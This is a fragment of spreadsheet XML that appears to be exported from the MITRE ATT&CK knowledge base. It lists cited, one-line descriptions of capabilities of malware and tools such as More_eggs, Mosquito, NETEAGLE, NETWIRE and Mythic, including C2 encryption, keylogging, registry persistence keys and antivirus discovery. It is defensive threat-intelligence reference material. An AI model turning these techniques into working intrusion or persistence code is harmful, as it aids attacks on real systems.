  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) has the ability to RC4 encrypt C2 communications.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--4c131eaa-c7c1-4c17-bcab-25cdf35e743c</t>
  </si>
  <si>
    <t xml:space="preserve">[Mongall](https://attack.mitre.org/software/S1026) can identify drives on compromised hosts and retrieve the hostname via `gethostbyname`.(Citation: SentinelOne Aoqin Dragon June 2022)
</t>
  </si>
  <si>
    <t>relationship--d336d669-ef00-476d-81f6-0fe88093e1e6</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) can use HTTP for C2 communication.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--062e9fe2-bfc1-49dc-85b2-e8356757a2e8</t>
  </si>
  <si>
    <t>S0149</t>
  </si>
  <si>
    <t>MoonWind</t>
  </si>
  <si>
    <t>malware--9ea525fa-b0a9-4dde-84f2-bcea0137b3c1</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) can delete itself or specified files.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>relationship--761edf58-baad-4626-acca-a137c251b0e6</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) has a command to return a directory listing for a specified directory.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>relationship--5c84d301-b6d1-4af8-9c25-1260e05fa924</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) has a keylogger.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>relationship--0e58b447-7b3e-404c-b8e5-003734c34574</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) saves information from its keylogging routine as a .zip file in the present working directory.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>relationship--9c4a8336-5f5f-4e58-b00d-b6bf1c59ec03</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) completes network communication via raw sockets.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>relationship--51c5e624-d08e-4750-91f9-fdc98ec56552</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) communicates over ports 80, 443, 53, and 8080 via raw sockets instead of the protocols usually associated with the ports.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>relationship--3ffac9f5-9a5e-41dd-aa7d-c981842015d7</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the number of removable drives from the victim.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>relationship--5cceffd9-5818-4481-bce6-4e326548d6b4</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) has a command to return a list of running processes.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>relationship--1035fe41-56b9-4966-bf3b-109ae950c908</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) encrypts C2 traffic using RC4 with a static key.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>relationship--609d3d8c-1995-43ef-a102-a39d668a774d</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) can obtain the victim hostname, Windows version, RAM amount, number of drives, and screen resolution.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>relationship--72fe5021-bace-41e4-9cc6-73af415225ac</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim IP address.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>relationship--c585ae70-1bda-4751-ad34-536a78b7daad</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim username.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>relationship--818a401d-dd4d-426a-b89c-d33625380b8b</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim's current time.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>relationship--77c63e89-71fe-47e3-babb-13e7722932ad</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</si>
  <si>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</si>
  <si>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relationship--66bb45a4-fadf-4000-9055-90f9bb206b37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</si>
  <si>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</si>
  <si>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relationship--162a051d-a551-4b8c-875a-75264768e541</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used a signed binary shellcode loader and a signed Dynamic Link Library (DLL) to create a reverse shell.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>relationship--c9e900cd-4c6b-4027-b6ca-b93b55c3c5e7</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) will decode malware components that are then dropped to the system.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>relationship--095f6266-2535-4991-ad6b-64388513d6e7</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) can remove itself from a system.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>relationship--786cf397-d548-48c1-9ba6-9af66450928c</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) can download and launch additional payloads.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>relationship--0485006f-c4f6-4657-85a0-6beec8d9368a</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used HTTP GET requests to check internet connectivity.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>relationship--04919717-aa68-4192-b095-c1607f8f6ead</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284)'s payload has been encrypted with a key that has the hostname and processor family information appended to the end.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>relationship--68b067cc-813f-4205-9de7-a8d6e4c8dd20</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used regsvr32.exe to execute the malicious DLL.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>relationship--d95285f5-803c-4eaf-977e-b221bd41f4d2</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) can obtain information on installed anti-malware programs.(Citation: Talos Cobalt Group July 2018)</t>
  </si>
  <si>
    <t>relationship--b741ebf6-1436-4c44-94cd-d3c5b1155a35</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used basE91 encoding, along with encryption, for C2 communication.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>relationship--ac5089b3-db8b-401d-924d-76e35bce7e9c</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used an RC4-based encryption method for its C2 communications.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>relationship--2b454322-5ad5-449f-86c9-092867acd51c</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has the capability to gather the OS version and computer name.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>relationship--100f4917-1702-4707-bd9f-58d471e77018</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has the capability to gather the IP address from the victim's machine.(Citation: Talos Cobalt Group July 2018)</t>
  </si>
  <si>
    <t>relationship--a68efc4c-4e5d-448a-8df4-2cf1980e716e</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has the capability to gather the username from the victim's machine.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>relationship--f2da9aaa-de4a-4825-b82d-d07ecc34e35c</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) uses HTTPS for C2.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>relationship--19e0594c-c5b4-45c8-926e-ae884164d294</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used cmd.exe for execution.(Citation: Security Intelligence More Eggs Aug 2019)(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>relationship--3524e5ae-332f-4e53-8129-e638961cc38e</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can use DNS tunneling to communicate with C2.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)</t>
  </si>
  <si>
    <t>relationship--7fb6c376-1d2b-4dfa-98cc-623b7567f3cf</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can resolve networking APIs from strings that are ADD-encrypted.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--7d37a0f1-1aea-456c-ade6-6d463a14fc14</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can delete its DLL file and related files by Registry value.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--bcf17c7c-2b8a-42fd-9b8a-2ee3dd3ef3f1</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) has obfuscated the FML.dll with 200MB of junk data.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--1180572a-fb9f-4279-9d19-5c095fd84659</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can write data to `HKLM\Software\NFC\IPA` and `HKLM\Software\NFC\` and delete Registry values.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)</t>
  </si>
  <si>
    <t>relationship--b2d24622-d6ee-4a9f-84cc-ecb6efab9625</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can read data from the Registry including from `HKLM\Software\NFC\IPA` and
`HKLM\Software\NFC\`.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--9bab0784-d593-4fbc-8f03-0f2340184beb</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can use `regsvr32.exe` for DLL execution.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--3b947696-f88a-4e6b-b408-b9f91c3cecdf</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can use Base64 encoded JSON libraries used in C2.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--c0677c42-7c1f-48ee-9a96-de3686917405</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can communicate using HTTP over IPv4 or IPv6 depending on a flag set.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--004cc00b-0a84-4783-aa4e-16b47f7465b2</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) uses COM hijacking as a method of persistence.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--810f3029-bbb2-4630-8032-1e1d47824973</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) deletes files using DeleteFileW API call.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--2ff304c1-9b4d-4f01-927d-53a1c339f7ab</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) stores configuration values under the Registry key &lt;code&gt;HKCU\Software\Microsoft\[dllname]&lt;/code&gt;.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--f37a0b65-043e-45f9-9e70-06ad9d75e856</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) can upload and download files to the victim.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--6d17cbbf-dd7e-456c-ad9e-e084c95efdaf</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</si>
  <si>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</si>
  <si>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relationship--67e6b603-a45d-4cbc-9b3e-546392934f7f</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) leverages the CreateProcess() and LoadLibrary() calls to execute files with the .dll and .exe extensions.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--eda49ac0-3077-4bff-9b30-44f527914e9c</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)’s installer is obfuscated with a custom crypter to obfuscate the installer.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--91a362c7-a111-4a1e-8978-1afcc110e5cf</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) can launch PowerShell Scripts.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--58c28a92-b3ed-41de-841d-8b8d1ad142be</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) runs &lt;code&gt;tasklist&lt;/code&gt; to obtain running processes.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--9701df31-e2f4-487b-a204-26c4347ef32d</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) establishes persistence under the Registry key &lt;code&gt;HKCU\Software\Run auto_update&lt;/code&gt;.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--e73d4586-569d-4f32-9468-95777d65770a</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)'s launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--1fadec32-a069-4103-bac1-1f61cf2e90e0</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)'s installer searches the Registry and system to see if specific antivirus tools are installed on the system.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--481c0cee-c977-430f-9f33-e5859b48be39</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--3671c28f-927b-40e0-ba75-079c0aafea5b</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) uses the &lt;code&gt;ipconfig&lt;/code&gt; command.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--a8efc910-79fc-474a-b3c1-27c8922c1af0</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) runs &lt;code&gt;whoami&lt;/code&gt; on the victim’s machine.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--1c360b2c-8004-4978-ba70-b0bb2257a791</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--c5535462-7d2c-4a97-a717-b29ea23e00cd</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)'s installer uses WMI to search for antivirus display names.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>relationship--1937b1c7-004f-4d22-bbf2-ab0de1ba8e1a</t>
  </si>
  <si>
    <t>S0699</t>
  </si>
  <si>
    <t>Mythic</t>
  </si>
  <si>
    <t>tool--d505fc8b-2e64-46eb-96d6-9ef7ffca5b66</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports SSL encrypted C2.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t>relationship--3843a4eb-cf3b-4cf9-91db-5a481ce3f32d</t>
  </si>
  <si>
    <t>26 March 2022</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports scripting of file downloads from agents.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t>relationship--bd651c13-04c8-4bff-9e68-b53b5f662510</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports DNS-based C2 profiles.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t>relationship--3a8ce0e1-0c2e-4ce5-bd21-8d51b3027376</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) provides various transform functions to encode and/or randomize C2 data.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t>relationship--448cab31-deb1-40d5-a7f6-848d0116c4b6</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports custom chunk sizes used to upload/download files.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t>relationship--ac603ee0-cb62-4ad5-852a-29b70b225c5f</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports domain fronting via custom request headers.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t>relationship--f0d8c9a9-48bb-4369-9631-f33fe2aa189e</t>
  </si>
  <si>
    <t>[Mythic](https://attack.mitre.org/software/S0699) can leverage a modified SOCKS5 proxy to tunnel egress C2 traffic.(Citation: Mythc Documentation)</t>
  </si>
  <si>
    <t>relationship--25ffefb1-15cc-4365-b401-b2975494f36b</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) can use a list of C2 URLs as fallback mechanisms in case one IP or domain gets blocked.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t>relationship--f1ab6a18-2624-4d35-b9e2-3f3a4288bcac</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports SMB-based peer-to-peer C2 profiles.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t>relationship--364f1a31-7710-4b81-91ce-919a89cdedcf</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) can leverage a peer-to-peer C2 profile between agents.(Citation: Mythc Documentation)		</t>
  </si>
  <si>
    <t>relationship--5a5914f0-4e99-494b-bcf3-b199f623e36d</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports WebSocket and TCP-based C2 profiles.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t>relationship--5e168a94-8882-4e6d-bc61-e86588b52242</t>
  </si>
  <si>
    <t>[Mythic](https://attack.mitre.org/software/S0699) can use SOCKS proxies to tunnel traffic through another protocol.(Citation: Mythc Documentation)</t>
  </si>
  <si>
    <t>relationship--d0228817-aba0-46c8-9449-de757f9238ac</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports HTTP-based C2 profiles.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t>relationship--3f0d3b07-9996-40bc-a2c3-6ed7eb39e5fc</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) can be used to scan IP networks.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)</t>
  </si>
  <si>
    <t>relationship--61de6721-267c-4224-8000-b3329f3057cf</t>
  </si>
  <si>
    <t xml:space="preserve">[NBTscan](https://attack.mitre.org/software/S0590) can dump and print whole packet content.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)	</t>
  </si>
  <si>
    <t>relationship--306eba85-eeb9-4fcb-8b23-ce38b09bbf24</t>
  </si>
  <si>
    <t xml:space="preserve">[NBTscan](https://attack.mitre.org/software/S0590) can list NetBIOS computer names.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)	</t>
  </si>
  <si>
    <t>relationship--be8fb0e9-a924-47be-9bb6-1eebe05881b7</t>
  </si>
  <si>
    <t xml:space="preserve">[NBTscan](https://attack.mitre.org/software/S0590) can be used to collect MAC addresses.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)	</t>
  </si>
  <si>
    <t>relationship--1f5655b0-7b7f-453c-9c2c-47a23fcc6222</t>
  </si>
  <si>
    <t xml:space="preserve">[NBTscan](https://attack.mitre.org/software/S0590) can list active users on the system.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)	</t>
  </si>
  <si>
    <t>relationship--06711c3f-230b-4d44-9c88-4861c48d2716</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) can obtain a list of all files and directories as well as logical drives.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--b7226792-d4ae-472c-a407-853d56fc887d</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) can download and execute a file from given URL.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--34d105a6-47ac-4a8b-b892-6f630cd97096</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) uses AES to encrypt certain information sent over its C2 channel.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--1bc5328a-e079-4478-9d04-d840626d4976</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) obtains the victim computer name and encrypts the information to send over its C2 channel.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--7a8a36ee-66f8-42ca-abeb-29e6223b91ee</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) obtains the victim username and encrypts the information to send over its C2 channel.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--06ef19c1-8490-42cc-b345-45f3aa29fc5f</t>
  </si>
  <si>
    <t>Adversaries can also use [NETEAGLE](https://attack.mitre.org/software/S0034) to establish an RDP connection with a controller over TCP/7519.</t>
  </si>
  <si>
    <t>relationship--32abb557-d923-4a6d-bda6-79a95063f298</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--406afc1a-4ea7-45c5-b137-7784f9ed53f3</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) is capable of reading files over the C2 channel.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--3565539f-7ebf-4288-8422-5212c774821b</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</si>
  <si>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</si>
  <si>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relationship--a713d0d3-2897-4da2-995f-df3a40f04b29</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</si>
  <si>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</si>
  <si>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relationship--5bb94c21-96c6-4c71-ae46-b222a69a493a</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</si>
  <si>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</si>
  <si>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relationship--b41abaa3-a21f-4d2c-9c60-c90c4f360b00</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) can send process listings over the C2 channel.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--16043223-3846-4138-93d0-671339ba3646</t>
  </si>
  <si>
    <t>The "SCOUT" variant of [NETEAGLE](https://attack.mitre.org/software/S0034) achieves persistence by adding itself to the &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--617fe29d-ac48-4cd0-ae8c-19cf7cfdbedd</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) will decrypt resources it downloads with HTTP requests by using RC4 with the key "ScoutEagle."(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--122e6f20-ab3b-4bf0-bef1-0372399bee7c</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</si>
  <si>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</si>
  <si>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relationship--61827309-9071-416b-aedf-7f82f224db2e</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) allows adversaries to execute shell commands on the infected host.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--84fcda4b-e58e-4ecd-8366-77d464e043ee</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can discover and close windows on controlled systems.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--ac0b0f1f-a9c8-4890-aa2f-6012b75a9c52</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to compress archived screenshots.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--8a2be44e-6a93-479f-ade9-7d49a1eb692a</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used a custom encryption algorithm to encrypt collected data.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>relationship--33eb3d03-426d-4410-b028-3528b3fefe5c</t>
  </si>
  <si>
    <t>08 January 2021</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can automatically archive collected data.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--394a227d-585f-48a5-84ac-cc40a0ad80e6</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can retrieve passwords from messaging and mail client applications.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--99ef9825-e901-49fc-8d87-668ff60b52dc</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</si>
  <si>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</si>
  <si>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relationship--8f58a6f1-f95b-4f38-8347-995880aa6029</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use crontabs to establish persistence.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--629775bc-6ca5-499c-b756-69017c064f37</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can encrypt C2 communications.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--ee35c721-0b74-4811-8d41-507270d0b9c7</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to search for files on the compromised host.(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>relationship--6c320415-f45c-438a-9671-c4c831ebd7fc</t>
  </si>
  <si>
    <t>12 January 2021</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can store its configuration information in the Registry under `HKCU:\Software\Netwire`.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--64cf2e56-3d7e-4999-a0ae-eb856b8e8f20</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can copy itself to and launch itself from hidden folders.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--aac15fc0-a17b-4295-bf46-b18569bc2c4f</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can downloaded payloads from C2 to the compromised host.(Citation: FireEye NETWIRE March 2019)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>relationship--f4ea1985-0e88-488d-b7ed-ac294719738a</t>
  </si>
  <si>
    <t>The [NETWIRE](https://attack.mitre.org/software/S0198) client has been signed by fake and invalid digital certificates.(Citation: McAfee Netwire Mar 2015)</t>
  </si>
  <si>
    <t>relationship--add09428-6eda-4cb2-8817-008038ed4f00</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can perform keylogging.(Citation: McAfee Netwire Mar 2015)(Citation: FireEye APT33 Webinar Sept 2017)(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>relationship--c1ed0848-df59-4cd1-8e39-a0d87002c652</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use launch agents for persistence.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--eeae0ab0-541c-401f-aa7c-af674bacdc6c</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to write collected data to a file created in the &lt;code&gt;./LOGS&lt;/code&gt; directory.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>relationship--e5562f3f-9657-49e8-8243-b5aff51e18a4</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can persist via startup options for Login items.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>relationship--cdd0980f-f3a8-456c-acf7-39fcd702bbb2</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been executed through luring victims into opening malicious documents.(Citation: FireEye NETWIRE March 2019)(Citation: Unit 42 NETWIRE April 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>relationship--38a6e4b2-40c2-41f2-a415-7fbf586cc232</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been executed through convincing victims into clicking malicious links.(Citation: FireEye NETWIRE March 2019)(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>relationship--393317c3-7dd7-487c-a2cb-81dfe4333ea3</t>
  </si>
  <si>
